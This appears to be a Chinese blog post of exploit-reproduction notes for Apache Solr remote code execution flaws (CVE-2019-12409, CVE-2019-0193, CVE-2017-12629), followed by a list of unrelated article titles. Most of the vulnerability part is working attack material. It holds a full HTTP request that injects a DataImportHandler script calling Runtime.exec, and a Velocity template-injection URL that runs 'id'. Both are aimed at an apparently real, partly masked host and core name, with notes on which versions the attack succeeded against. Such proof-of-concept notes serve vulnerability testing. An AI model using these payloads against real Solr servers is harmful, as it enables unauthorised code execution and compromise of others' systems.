CVE-2019-12409

Date:

//

类型:

配置不当导致远程代码执行

前置条件:

影响范围:

Solr 8.1. and 8.2. for Linux

Solr下载:
https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

Solr安装(默认端口8983): 
~/solr-8.2.0/bin# ./solr -e dih -force   

Kali复现:

Apache solr模板注入漏洞

CVE-2019-0193

Date



类型

远程代码执行

影响范围

Apache Solr < 8.2.0

前置条件
(1)core配置文件config存在
(2)索引库使用了DataImportHandler模块
复现
(1)查core

(2)发包-》弹出计算器窗口

GET /solr/factube_dbc_shard2_replica_n23/dataimport HTTP/1.1
Host: xx.xx.27.22:9002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 522

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=factube_dbc_shard2_replica_n23&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>

CVE-2017-12629

Date



类型

远程代码执行

影响范围

漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1,包括:

RedhatSingle Sign-On 7.0

+ Redhat Linux 6.2 E sparc

+ Redhat Linux 6.2 E i386

+ Redhat Linux 6.2 E alpha

+ Redhat Linux 6.2 sparc

+ Redhat Linux 6.2 i386

+ Redhat Linux 6.2 alpha

Redhat JBoss Portal Platform 6

Redhat JBoss EAP 7 0

Redhat Jboss EAP 6

Redhat JBoss Data Grid 7.0.0

Redhat Enterprise Linux 6

+ Trustix Secure Enterprise Linux 2.0

+ Trustix Secure Linux 2.2

+ Trustix Secure Linux 2.1

+ Trustix Secure Linux 2.0

Redhat Collections for Red Hat EnterpriseLinux 0

Apache Solr 6.6.1

Apache Solr 6.6

Apache Solr 6.5.1

Apache Solr 6.5

Apache Solr 6.4

Apache Solr 6.3

Apache Solr 6.2

Apache Solr 6.6

Apache Solr 6.3

Apache Solr 6.0

ApacheLucene 0

SSV ID:SSV-98097

Date:

--

类型:

修改配置文件参数导致远程代码执行

影响范围:

Apache Solr .x - 8.2.,存在config API版本

Windows下启动Solr
solr.cmd start

前置条件

复现
Solr7.7.2和Solr8.2.0复现失败(POST修改参数失败),Solr7.4.0直接打EXP成功

EXP:
http://xx.xx.27.22:9002/solr/factube_dbc_shard2_replica_n23/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

最新文章

  1. Pressure-sensitive pores scattered
  2. Coder-Strike 2014 - Round 1 D. Giving Awards
  3. Java 生成验证码
  4. java 16-6 泛型
  5. 侧滑SilidingMenu ,ViewPager 和,PagerIndicator 冲突
  6. html5 canvas 笔记一(基本用法与绘制图形)
  7. PHP 关于回调的用法
  8. Knockout应用开发指南 第三章:绑定语法(3)
  9. ASP.NET Web API的HttpController是如何被激活的?
  10. 使用idea Live Template实现eclipse syso自动提示代码功能
  11. C#数组和元组
  12. 【原】cookie小结
  13. 看懂 ,学会 .NET 事件的正确姿势
  14. 交给子类: Template Method(模板方法模式)【PHP】
  15. 从零打卡leetcode之day 2---两数相加
  16. 人工智能--AI篇
  17. HADOOP HA 踩坑 - org.apache.hadoop.hdfs.qjournal.protocol.JournalNotFormattedException: Journal Storage Directory /mnt/data1/hadoop/dfs/journal/hdfscluster not formatted
  18. mysql 1,2,3 关联查询出数字代表的具体意思
  19. android画板笔锋实现
  20. Java数据结构和算法(五):队列

热门文章

  1. SpringMVC 向前台页面传值-ModelAndView
  2. Python之面向对象之单例模式的四种方式
  3. 【转】h5页面audio不自动播放问题
  4. 数据结构-STL序列式容器总结
  5. SpringBoot 1.X版本设置Https访问以及跨域https访问的问题
  6. php7魔术方法
  7. vertical-greenplum
  8. UVa 1600 Patrol Robot (BFS最短路 &amp;&amp; 略不一样的vis标记)
  9. 186. [USACO Oct08] 牧场旅行 (第三次考试大整理)
  10. Module not found: Error: Can&#39;t resolve &#39; vue-resource&#39;